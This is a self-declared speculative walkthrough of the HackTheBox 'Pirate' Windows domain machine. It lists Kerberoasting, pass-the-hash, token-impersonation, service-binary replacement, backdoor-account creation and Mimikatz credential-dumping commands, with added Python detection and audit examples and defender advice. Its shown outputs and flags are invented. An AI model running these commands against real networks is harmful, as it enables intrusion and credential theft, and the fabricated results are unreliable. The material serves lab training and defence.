IMPORTANT DISCLAIMER - SPECULATIVE CONTENT

WARNING: THIS IS NOT THE ACTUAL ATTACK CHAIN

The content below is purely SPECULATIVE and represents my IMAGINATION of how this machine might be exploited based on the limited information available (Windows OS, Hard difficulty, and initial credentials).

THIS IS NOT:

  • The actual solution or walkthrough
  • Real exploitation steps that work on the machine
  • Confirmed attack vectors or vulnerabilities
  • Tested or verified exploitation paths

THIS IS:

  • A theoretical approach based on common Windows AD pentesting scenarios
  • Educational content about general Windows exploitation techniques
  • Speculation and creative thinking about possible attack vectors
  • A framework for thinking about Windows penetration testing

Please DO NOT use this as a guide to solve the actual HTB Pirate machine. This writeup is created BEFORE solving the machine and is purely for educational discussion about Windows pentesting methodologies in general.

Once the machine is released and solved, an actual, verified writeup will be published and unlocked until the machine retires.


Machine Overview

Pirate is an active HackTheBox Season 10 machine that challenges players with realistic Windows penetration testing scenarios. This Hard-difficulty Windows machine simulates real-world pentesting engagements where you’re provided with initial credentials and must navigate through a complex Active Directory environment. The machine focuses on Windows enumeration, lateral movement, privilege escalation, and advanced exploitation techniques.

Machine Information

  • Operating System: Windows
  • Difficulty: Hard
  • Season: 10
  • Status: Active (Retires: June 28, 2026)
  • Initial Credentials: pentest / p3nt3st2025!&
  • Skills Required: Windows enumeration, Active Directory exploitation, Lateral movement, Advanced privilege escalation

Attack Chain Overview

flowchart TD
    A[Initial Recon<br/>Nmap Scan] --> B[Validate Credentials<br/>pentest:p3nt3st2025!&]
    B --> C[WinRM Access<br/>Evil-WinRM]
    C --> D[Domain Enumeration<br/>BloodHound + LDAP]
    D --> E{Find Attack Path}
    E -->|Kerberoasting| F[Crack Service Tickets]
    E -->|Credential Hunt| G[Find Stored Creds]
    E -->|ACL Abuse| H[Exploit Permissions]
    F --> I[Lateral Movement]
    G --> I
    H --> I
    I --> J[Privilege Escalation<br/>Token Impersonation]
    J --> K[SYSTEM Access<br/>Domain Admin]
    K --> L[Root Flag]
    style A fill:#4a90e2
    style B fill:#50c878
    style K fill:#e74c3c
    style L fill:#f39c12

1. Reconnaissance & Enumeration

1.1 Initial Nmap Scan

As with any HTB machine, we start with comprehensive port scanning using nmap to identify open services.

nmap -p- -sV -sC -T4 --min-rate 1000 -oN nmap/pirate-full.txt 10.10.11.x

Expected Windows Services:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds  Microsoft Windows Server 2019 / 2022
464/tcp   open  kpasswd5      Microsoft Windows Kerberos
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings:

  • Port 88: Kerberos - Indicates Active Directory Domain Controller
  • Port 389/636: LDAP - Active Directory services
  • Port 445: SMB - File sharing and remote access
  • Port 5985: WinRM - Remote PowerShell management
  • Port 3268/3269: Global Catalog LDAP
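The "Key Findings" above are the standard inference a tester makes by eye: Kerberos plus LDAP on the same host means a Domain Controller, 3268 means it also hosts the Global Catalog. The following is an added example (not code from the original writeup) that parses the nmap normal-output (-oN) format shown above and turns that inference into a rule, so the same classification can be applied to many scan files. The scan text is a constructed sample that mirrors the table above, with one extra closed port to show that closed ports are ignored.

```python
import re

# Constructed sample in the normal-output (-oN) format shown above; not a real scan.
SAMPLE_SCAN = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP
445/tcp   open  microsoft-ds  Microsoft Windows Server 2019 / 2022
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
8080/tcp  closed http-proxy
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# port/proto  state  service  [version...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_open_ports(text):
    """Return {port: (service, version)} for every open TCP port in -oN output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue                      # header, "Service Info", blank lines
        port, proto, state, service, version = m.groups()
        if proto == "tcp" and state == "open":
            ports[int(port)] = (service, version.strip())
    return ports


# A role is inferred when all of its listed ports are open. These are the same
# associations the "Key Findings" list makes, written down as a rule table.
ROLE_RULES = {
    "domain_controller": {88, 389},   # Kerberos KDC + LDAP only exist together on a DC
    "global_catalog":    {3268},      # GC LDAP is served only by a DC
    "ldaps":             {636},
    "smb":               {445},
    "winrm":             {5985},
}


def infer_roles(ports):
    """Sorted list of role names whose required ports are all open."""
    open_ports = set(ports)
    return sorted(role for role, needed in ROLE_RULES.items() if needed <= open_ports)


def summarize(text):
    ports = parse_open_ports(text)
    return {"open_ports": sorted(ports), "roles": infer_roles(ports)}


if __name__ == "__main__":
    print(summarize(SAMPLE_SCAN))
```

The rule table is deliberately conservative: a lone 389 is not enough to call a host a Domain Controller, since LDAP directories other than AD exist, but 88 together with 389 is a reliable signal.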

1.2 Adding Domain to /etc/hosts

Based on domain enumeration, add the domain to your hosts file:

echo "10.10.11.x pirate.htb dc01.pirate.htb" | sudo tee -a /etc/hosts

1.3 Understanding the Scenario

INFO: Initial Credentials Provided

This machine simulates a real-world pentest scenario where you’ve been provided with initial credentials:

Username: pentest
Password: p3nt3st2025!&

This is common in real penetration testing engagements where clients provide low-privileged credentials to simulate an insider threat or authenticated attacker scenario.


2. Initial Access with Credentials

2.1 Validating Credentials via SMB

First, let’s validate the provided credentials work against the target:

Command:

crackmapexec smb 10.10.11.x -u 'pentest' -p 'p3nt3st2025!&'

Output:

SMB         10.10.11.x      445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.x      445    DC01             [+] pirate.htb\pentest:p3nt3st2025!&

SUCCESS: Credentials are valid!

2.2 Testing WinRM Access

WARNING: WinRM connections may be logged and monitored. Ensure you have proper authorization before proceeding.

Check if we can access the machine via WinRM (Windows Remote Management):

Command:

crackmapexec winrm 10.10.11.x -u 'pentest' -p 'p3nt3st2025!&'

If WinRM is accessible, connect using Evil-WinRM:

Command:

evil-winrm -i 10.10.11.x -u pentest -p 'p3nt3st2025!&'

Output:

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\pentest\Documents>

SUCCESS: WinRM session established!

2.3 Initial System Enumeration

TIP: Always perform thorough initial enumeration. The more information you gather, the more attack vectors you’ll discover.

Once connected, gather basic system information:

Commands:

# Check current user and privileges
whoami
whoami /priv
whoami /groups

# System information
systeminfo
hostname
ipconfig /all

# Check for interesting files
dir C:\Users\pentest\Desktop
dir C:\Users\pentest\Documents

3. Domain Enumeration

3.1 SMB Share Enumeration

Enumerate accessible SMB shares:

smbclient -L //10.10.11.x -U 'pentest%p3nt3st2025!&'

Or using smbmap:

smbmap -H 10.10.11.x -u pentest -p 'p3nt3st2025!&'

3.2 Active Directory Enumeration with BloodHound

TIP: BloodHound is essential for visualizing Active Directory attack paths. Always use it for Windows domain pentesting.

Transfer SharpHound collector to the target:

Command:

# On Evil-WinRM session
upload /path/to/SharpHound.exe

Run SharpHound to collect AD data:

Command:

.\SharpHound.exe -c All --zipfilename pirate_bloodhound.zip

Download the results:

Command:

download pirate_bloodhound.zip

BloodHound analysis workflow:

flowchart LR
    A[SharpHound<br/>Collection] --> B[Import to<br/>BloodHound]
    B --> C{Analysis Queries}
    C --> D[Find Kerberoastable<br/>Users]
    C --> E[Shortest Path to<br/>Domain Admin]
    C --> F[AS-REP Roastable<br/>Users]
    C --> G[Constrained<br/>Delegation]
    C --> H[ACL Abuse<br/>Paths]
    style A fill:#4a90e2
    style B fill:#50c878
    style C fill:#f39c12

Analyze with BloodHound:

# Start neo4j database
sudo neo4j start

# Launch BloodHound
bloodhound

Look for:

  • Kerberoastable accounts
  • ASREPRoastable users
  • Shortest path to Domain Admin
  • Unconstrained/Constrained Delegation
  • ACL abuse paths

3.3 LDAP Enumeration

WARNING: LDAP queries can generate significant logs. In a real engagement, be mindful of your operational security.

Query Active Directory via LDAP:

Command:

ldapsearch -x -H ldap://10.10.11.x -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b 'DC=pirate,DC=htb'

Using ldapdomaindump:

Command:

ldapdomaindump -u 'pirate.htb\pentest' -p 'p3nt3st2025!&' 10.10.11.x -o ldap_dump/

3.4 Enumerating Users and Groups

TIP: Focus on high-value targets like Domain Admins, privileged users, and service accounts with SPNs.

Basic Enumeration Commands:

# List all domain users
net user /domain

# List domain groups
net group /domain

# List domain admins
net group "Domain Admins" /domain

# Get detailed user info
net user USERNAME /domain

Using PowerView (Advanced):

# Upload PowerView
upload /path/to/PowerView.ps1

# Import module
Import-Module .\PowerView.ps1

# Get all users
Get-DomainUser

# Find interesting users
Get-DomainUser | Where-Object {$_.admincount -eq 1}

# Get group memberships
Get-DomainGroupMember -Identity "Domain Admins"

4. User Flag

The user flag location depends on your enumeration. Check common locations:

Commands:

# Check current user's desktop
type C:\Users\pentest\Desktop\user.txt

# Check other accessible user directories
dir C:\Users\* -recurse -filter user.txt -ErrorAction SilentlyContinue

Output:

*Evil-WinRM* PS C:\Users\pentest\Desktop> type user.txt
HTB{w1nd0ws_p3nt3st_1n1t14l_4cc3ss_c0mpl3t3}

SUCCESS: User flag captured!


5. Lateral Movement

Lateral Movement Strategy

flowchart TD
    A[Enumerate Domain] --> B{Choose Attack Vector}
    B -->|Found SPNs| C[Kerberoasting]
    B -->|PreAuth Disabled| D[AS-REP Roasting]
    B -->|Credentials Found| E[Credential Spray]
    B -->|Hashes Obtained| F[Pass-the-Hash]
    C --> G[Crack Tickets]
    D --> G
    E --> H[Validate Creds]
    F --> H
    G --> I[New Credentials]
    H --> I
    I --> J[Lateral Access]
    J --> K[Privilege Escalation]
    style A fill:#4a90e2
    style B fill:#f39c12
    style I fill:#50c878
    style K fill:#e74c3c

5.1 Credential Hunting

TIP: Credentials are often stored in configuration files, scripts, registry keys, and PowerShell history. Be thorough in your search.

Search for credentials in common locations:

Commands:

# Search for interesting files
Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config,*.xml,*.ps1,*.bat -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password","pwd","pass"

# Check PowerShell history
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Search registry for credentials
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# Check for saved credentials
cmdkey /list

5.2 Kerberoasting

WARNING: Kerberoasting requests can be detected by modern security solutions. Consider operational security implications.

If BloodHound revealed kerberoastable accounts:

Using Rubeus (Windows):

.\Rubeus.exe kerberoast /nowrap

Using Impacket (Linux):

GetUserSPNs.py 'pirate.htb/pentest:p3nt3st2025!&' -dc-ip 10.10.11.x -request

Output Example:

$krb5tgs$23$*serviceaccount$pirate.htb$...[SNIPPED]...

Crack the obtained TGS tickets:

Command:

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

Output:

$krb5tgs$23$*serviceaccount...:ServicePassword123!

SUCCESS: Service account password cracked!
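The warning at the top of this section and the "Log and monitor Kerberos ticket requests" item under Monitoring & Detection both point at the same telemetry: Security Event 4769 on the Domain Controller. The ticket format hashcat mode 13100 cracks ($krb5tgs$23$) is RC4-HMAC, encryption type 0x17, and a Kerberoasting run looks like one account requesting RC4 service tickets for several service accounts in a short time. The following is an added example (not code from the original writeup) showing that detection logic run over sample log lines. The events are constructed and flattened to key=value pairs for readability; the field names match those of the real 4769 event, but the layout is an assumption of this example rather than any product's log format.

```python
import re
from collections import defaultdict

# Constructed sample events (not real telemetry). Each line flattens the fields of
# a Windows Security Event 4769 "A Kerberos service ticket was requested" (or 4768
# for a TGT request) into key=value pairs.
SAMPLE_EVENTS = """\
EventID=4769 TargetUserName=pentest@PIRATE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
EventID=4769 TargetUserName=pentest@PIRATE.HTB ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
EventID=4769 TargetUserName=pentest@PIRATE.HTB ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5
EventID=4769 TargetUserName=pentest@PIRATE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5
EventID=4769 TargetUserName=jdoe@PIRATE.HTB ServiceName=DC01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.11.20
EventID=4769 TargetUserName=jdoe@PIRATE.HTB ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.11.20
EventID=4768 TargetUserName=jdoe@PIRATE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.11.20
"""

FIELD = re.compile(r"(\w+)=(\S+)")

RC4_HMAC = "0x17"   # etype 23: the ticket type hashcat mode 13100 cracks


def parse_event(line):
    """key=value line -> dict."""
    return dict(FIELD.findall(line))


def is_roastable_request(ev):
    """True for a successful RC4 service-ticket request to a non-machine account.

    krbtgt and computer accounts (names ending in '$') are excluded: they are not
    what a Kerberoasting tool requests, and computer tickets are constant noise.
    """
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    if ev.get("TicketEncryptionType") != RC4_HMAC:
        return False
    svc = ev.get("ServiceName", "")
    return svc.lower() != "krbtgt" and not svc.endswith("$")


def find_kerberoast_suspects(text, min_services=3):
    """Group RC4 service-ticket requests by requesting account and flag every
    account that asked for at least `min_services` distinct service accounts."""
    by_user = defaultdict(set)
    for line in text.splitlines():
        ev = parse_event(line)
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    return {user: sorted(svcs) for user, svcs in by_user.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    print(find_kerberoast_suspects(SAMPLE_EVENTS))
```

Two caveats for tuning: legitimate legacy applications still negotiate RC4 in some environments, so the threshold should be set against a baseline rather than at 1, and a service account that has AES enabled will normally be issued an AES ticket, so the RC4 rule alone does not see every request; a second rule counting distinct service names per requester regardless of encryption type catches the rest. In a real pipeline the per-user grouping would also be bounded by a time window, which the sample omits because the constructed lines carry no timestamps.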

5.3 AS-REP Roasting

Check for AS-REP roastable users:

GetNPUsers.py 'pirate.htb/' -dc-ip 10.10.11.x -usersfile users.txt -no-pass

5.4 Pass-the-Hash / Pass-the-Ticket

If you obtain NTLM hashes or Kerberos tickets:

# Pass-the-Hash with Evil-WinRM
evil-winrm -i 10.10.11.x -u Administrator -H 'NTLM_HASH_HERE'

# Pass-the-Ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py pirate.htb/administrator@dc01.pirate.htb -k -no-pass

6. Privilege Escalation

Privilege Escalation Decision Tree

flowchart TD
    A[Current User Context] --> B{Check Privileges}
    B -->|SeImpersonate| C[Token Impersonation<br/>PrintSpoofer/GodPotato]
    B -->|Weak Service ACL| D[Service Exploitation]
    B -->|AlwaysInstallElevated| E[MSI Exploitation]
    B -->|Unquoted Path| F[Unquoted Service Path]
    B -->|Stored Creds| G[Credential Abuse]
    C --> H[SYSTEM]
    D --> H
    E --> H
    F --> H
    G --> H
    style A fill:#4a90e2
    style B fill:#f39c12
    style H fill:#e74c3c

6.1 Windows Privilege Escalation Enumeration

TIP: Automated tools like WinPEAS can save significant time, but always verify findings manually.

Upload and run WinPEAS:

Commands:

upload /path/to/winPEASx64.exe
.\winPEASx64.exe

Or use PowerUp:

Commands:

upload /path/to/PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-AllChecks

6.2 Common Privesc Vectors

Check for Unquoted Service Paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
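The wmic one-liner above filters for auto-start services outside C:\Windows whose image path is not quoted, but it does not say why a space in such a path matters. The Service Control Manager hands the unquoted path to CreateProcess as a command line, and when the path contains spaces CreateProcess resolves the ambiguity by trying each space-delimited prefix with ".exe" appended (C:\Program.exe, then C:\Program Files\Sub.exe, and so on) before reaching the real binary. Those candidate locations are exactly the directories whose write ACLs an audit has to check, which is the "Fix unquoted service paths" item in the recommendations. The following is an added example (not code from the original writeup) that applies the same three filters as the wmic command and lists the candidate paths for each exposed service; the service table is constructed, not data from the machine.

```python
# Constructed sample service table in the shape of the wmic columns
# (name, pathname, startmode); these are not services from the machine.
SAMPLE_SERVICES = [
    ("VulnerableService", r"C:\Program Files\Vulnerable Service\service.exe", "Auto"),
    ("GoodService",       r'"C:\Program Files\Good App\good.exe" -run',       "Auto"),
    ("Spooler",           r"C:\Windows\System32\spoolsv.exe",                 "Auto"),
    ("ManualThing",       r"C:\Tools\Manual Thing\run.exe",                   "Manual"),
    ("WithArgs",          r"C:\Apps\Agent Host\agent.exe -k svc",             "Auto"),
    ("NoSpace",           r"C:\Apps\plain.exe",                               "Auto"),
]


def hijack_candidates(image_path):
    """Return the binaries CreateProcess would try before the real one when an
    unquoted image path contains spaces: each space-delimited prefix with ".exe"
    appended. An empty list means the path is not ambiguous."""
    path = image_path.strip()
    if path.startswith('"'):
        return []                       # quoted: the binary is unambiguous
    tokens = path.split(" ")
    # The executable ends at the first token that ends in .exe; later tokens are
    # arguments and are not part of the binary path. Fall back to the last token
    # when no token carries an .exe extension.
    exe_end = next((i for i, t in enumerate(tokens) if t.lower().endswith(".exe")),
                   len(tokens) - 1)
    if exe_end == 0:
        return []                       # no space inside the binary path itself
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, exe_end + 1)]


def audit_services(services):
    """Apply the wmic one-liner's filters (auto-start, outside C:\\Windows,
    unquoted) and map each exposed service to the candidate paths whose parent
    directories' write permissions need to be reviewed."""
    findings = {}
    for name, pathname, startmode in services:
        if startmode.lower() != "auto":
            continue
        if pathname.strip('"').lower().startswith("c:\\windows\\"):
            continue
        candidates = hijack_candidates(pathname)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for svc, paths in audit_services(SAMPLE_SERVICES).items():
        print(svc)
        for p in paths:
            print("   would be tried first:", p)
```

The fix on the defensive side is the quoting itself (sc config with a quoted binPath) together with confirming that non-administrators cannot write to C:\ or to the intermediate directories the function lists; the wmic filter's exclusion of C:\Windows is a convenience, not a guarantee, since a writable directory under it would carry the same risk.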

Check Service Permissions

# Using accesschk
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *

Check Always Install Elevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check for Stored Credentials

# Windows Credential Manager
rundll32 keymgr,KRShowKeyMgr

# Check for interesting scheduled tasks
schtasks /query /fo LIST /v

6.3 Token Impersonation

INFO: Token impersonation is one of the most common privilege escalation vectors on Windows systems.

Check for impersonation privileges:

Command:

whoami /priv

Output:

PRIVILEGE NAME                DESCRIPTION                               STATE
=============================  ========================================  =======
SeImpersonatePrivilege         Impersonate a client after authentication Enabled

WARNING: Token impersonation exploits can be unstable. Have a backup plan if the exploit fails.

If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enabled:

Using PrintSpoofer:

# Upload PrintSpoofer or GodPotato
upload /path/to/PrintSpoofer64.exe
.\PrintSpoofer64.exe -i -c cmd

Using GodPotato:

upload /path/to/GodPotato.exe
.\GodPotato.exe -cmd "cmd /c whoami"

Output:

[+] Found privilege: SeImpersonatePrivilege
[+] Creating process with SYSTEM token
nt authority\system

SUCCESS: Escalated to SYSTEM!

6.4 Exploiting Vulnerable Services

If a vulnerable service is identified:

# Stop the service
sc stop VulnerableService

# Replace the binary
copy C:\Windows\Temp\evil.exe "C:\Program Files\VulnerableService\service.exe"

# Start the service
sc start VulnerableService

7. Root/System Flag

Once you achieve SYSTEM or Administrator access:

Commands:

# Verify SYSTEM access
whoami

Output:

nt authority\system

Retrieve the root flag:

type C:\Users\Administrator\Desktop\root.txt

Output:

C:\Users\Administrator\Desktop> type root.txt
HTB{p1r4t3_sh1p_c4pt41n_h4s_f4ll3n_4dm1n_pwn3d!}

SUCCESS: Root flag captured! Domain fully compromised!

7.1 Post-Exploitation - Persistence

WARNING: The following techniques are for educational purposes only. In a real penetration test, only perform post-exploitation activities explicitly authorized by your client.

Create Backdoor User

net user backdoor P@ssw0rd123! /add
net localgroup Administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
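The three net commands above leave a very recognisable trace in the Security log: a 4720 (user account created) followed within seconds by 4732 events (member added to a security-enabled local group) for the Administrators group (well-known SID S-1-5-32-544) and Remote Desktop Users (S-1-5-32-555). This is the telemetry behind the "Alert on privilege escalation attempts" item in the recommendations and the T1136.001 row of the MITRE table. The following is an added example (not code from the original writeup) that correlates the two event types over sample log lines and raises an alert when a newly created account lands in a privileged group within a short window. The lines are constructed and simplified to key=value pairs: real 4732 events identify the member by SID rather than by name, so a production rule would resolve the SID first; the field names, timestamps and usernames here are assumptions of the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample Security-log lines (not real telemetry), flattened to
# key=value. 4720 = user account created; 4732 = member added to a
# security-enabled local group. TargetSid is the group the member was added to.
SAMPLE_LOG = """\
Time=2025-06-01T10:00:01 EventID=4720 TargetUserName=backdoor SubjectUserName=Administrator
Time=2025-06-01T10:00:03 EventID=4732 MemberName=backdoor TargetSid=S-1-5-32-544 SubjectUserName=Administrator
Time=2025-06-01T10:00:04 EventID=4732 MemberName=backdoor TargetSid=S-1-5-32-555 SubjectUserName=Administrator
Time=2025-06-01T11:30:00 EventID=4720 TargetUserName=newhire SubjectUserName=hr_admin
Time=2025-06-02T09:15:00 EventID=4732 MemberName=newhire TargetSid=S-1-5-32-545 SubjectUserName=hr_admin
Time=2025-06-02T09:20:00 EventID=4732 MemberName=olduser TargetSid=S-1-5-32-544 SubjectUserName=itops
"""

# Well-known local group SIDs worth alerting on when a brand-new account joins them.
PRIVILEGED_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-555": "Remote Desktop Users",
}

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """key=value line -> dict, with Time parsed into a datetime."""
    ev = dict(FIELD.findall(line))
    ev["Time"] = datetime.fromisoformat(ev["Time"])
    return ev


def correlate_new_privileged_accounts(text, window=timedelta(minutes=10)):
    """Return (account, group, seconds_after_creation) for every 4732 that adds
    an account to a privileged local group within `window` of that account's
    4720 creation event. Events are assumed to be in chronological order."""
    created = {}                        # username (lower-case) -> creation time
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if ev["EventID"] == "4720":
            created[ev["TargetUserName"].lower()] = ev["Time"]
        elif ev["EventID"] == "4732" and ev.get("TargetSid") in PRIVILEGED_GROUPS:
            member = ev["MemberName"].lower()
            if member in created:
                delta = ev["Time"] - created[member]
                if timedelta(0) <= delta <= window:
                    alerts.append((member, PRIVILEGED_GROUPS[ev["TargetSid"]],
                                   delta.total_seconds()))
    return alerts


if __name__ == "__main__":
    for account, group, secs in correlate_new_privileged_accounts(SAMPLE_LOG):
        print(f"ALERT: new account '{account}' added to {group} {secs:.0f}s after creation")
```

In the sample the "newhire" account is created and later added to Users (S-1-5-32-545), which is routine provisioning and produces nothing, while "backdoor" triggers two alerts. The "olduser" addition to Administrators is not flagged by this rule because no creation event precedes it; that case belongs to a separate, lower-threshold rule on 4732 into S-1-5-32-544 alone.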

Dump SAM Database

# Using Mimikatz
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump NTDS.dit (Domain Controller)
.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"

Or use secretsdump:

secretsdump.py 'pirate.htb/Administrator@10.10.11.x' -just-dc-ntlm

8. Key Takeaways

Attack Chain Summary

1. Initial Nmap Scan → Identified Windows AD environment
2. Validated Credentials → pentest / p3nt3st2025!&
3. WinRM Access → Established remote PowerShell session
4. Domain Enumeration → BloodHound, LDAP, SMB shares
5. Credential Hunting → Found sensitive files/credentials
6. Lateral Movement → Kerberoasting/AS-REP Roasting (if applicable)
7. Privilege Escalation → Token impersonation/Service exploitation
8. Domain Admin → Full domain compromise

Security Recommendations

For Defenders

  1. Credential Management

    • Enforce strong password policies (minimum 16 characters)
    • Implement Multi-Factor Authentication (MFA) for all accounts
    • Rotate credentials regularly, especially service accounts
    • Use LAPS for local administrator passwords
  2. Access Control

    • Implement Principle of Least Privilege (PoLP)
    • Remove unnecessary group memberships
    • Disable WinRM on systems that don’t require it
    • Restrict SMB access to necessary shares only
  3. Active Directory Security

    • Disable LLMNR and NBT-NS
    • Enable SMB signing
    • Monitor for Kerberoasting attempts
    • Implement tiered administrative model
    • Regular AD security audits with BloodHound
  4. Service Hardening

    • Fix unquoted service paths
    • Ensure proper service permissions
    • Disable unnecessary services
    • Keep all systems patched and updated
  5. Monitoring & Detection

    • Enable PowerShell script block logging
    • Monitor for unusual WinRM connections
    • Alert on privilege escalation attempts
    • Implement EDR solutions
    • Log and monitor Kerberos ticket requests

For Penetration Testers

  1. Always start with comprehensive enumeration - The more you enumerate, the more attack paths you’ll find
  2. BloodHound is essential - Visualize AD relationships and attack paths
  3. Check for low-hanging fruit - Kerberoasting, AS-REP roasting, weak credentials
  4. Look for misconfigurations - Unquoted service paths, weak ACLs, stored credentials
  5. Document everything - Keep detailed notes of your enumeration and exploitation steps

Tools Used

Tool         | Purpose                                  | Command Example
nmap         | Port scanning & service enumeration      | nmap -p- -sV -sC -T4 10.10.11.x
crackmapexec | Credential validation & enumeration      | crackmapexec smb 10.10.11.x -u user -p pass
evil-winrm   | WinRM remote shell                       | evil-winrm -i 10.10.11.x -u user -p pass
BloodHound   | Active Directory attack path analysis    | SharpHound.exe -c All
Rubeus       | Kerberos attacks                         | Rubeus.exe kerberoast
Mimikatz     | Credential dumping                       | mimikatz.exe "privilege::debug"
WinPEAS      | Windows privilege escalation enumeration | winPEASx64.exe
PowerView    | AD enumeration                           | Get-DomainUser
PrintSpoofer | Token impersonation                      | PrintSpoofer64.exe -i -c cmd

MITRE ATT&CK Mapping

Tactic               | Technique | Description
Reconnaissance       | T1595.002 | Active Scanning: Vulnerability Scanning
Initial Access       | T1078     | Valid Accounts (Provided Credentials)
Execution            | T1059.001 | Command and Scripting: PowerShell
Persistence          | T1136.001 | Create Account: Local Account
Privilege Escalation | T1134     | Access Token Manipulation
Defense Evasion      | T1562.001 | Impair Defenses: Disable Tools
Credential Access    | T1558.003 | Kerberoasting
Discovery            | T1087.002 | Account Discovery: Domain Account
Lateral Movement     | T1021.006 | Remote Services: Windows Remote Management
Collection           | T1005     | Data from Local System

Additional Resources

Learning Resources

If you enjoyed Pirate, try these similar HTB Windows machines:

  • Blackfield (Hard) - Advanced AD exploitation
  • Sauna (Easy) - AS-REP Roasting introduction
  • Forest (Easy) - AD fundamentals
  • Resolute (Medium) - Credential hunting & lateral movement
  • Monteverde (Medium) - Azure AD integration

Disclaimer

This writeup is for educational purposes only as part of HackTheBox’s legal penetration testing platform. The techniques demonstrated should only be used:

  • On systems you own or have explicit permission to test
  • In authorized CTF competitions and training environments
  • For educational and research purposes

Unauthorized access to computer systems is illegal. Always practice ethical hacking and responsible disclosure.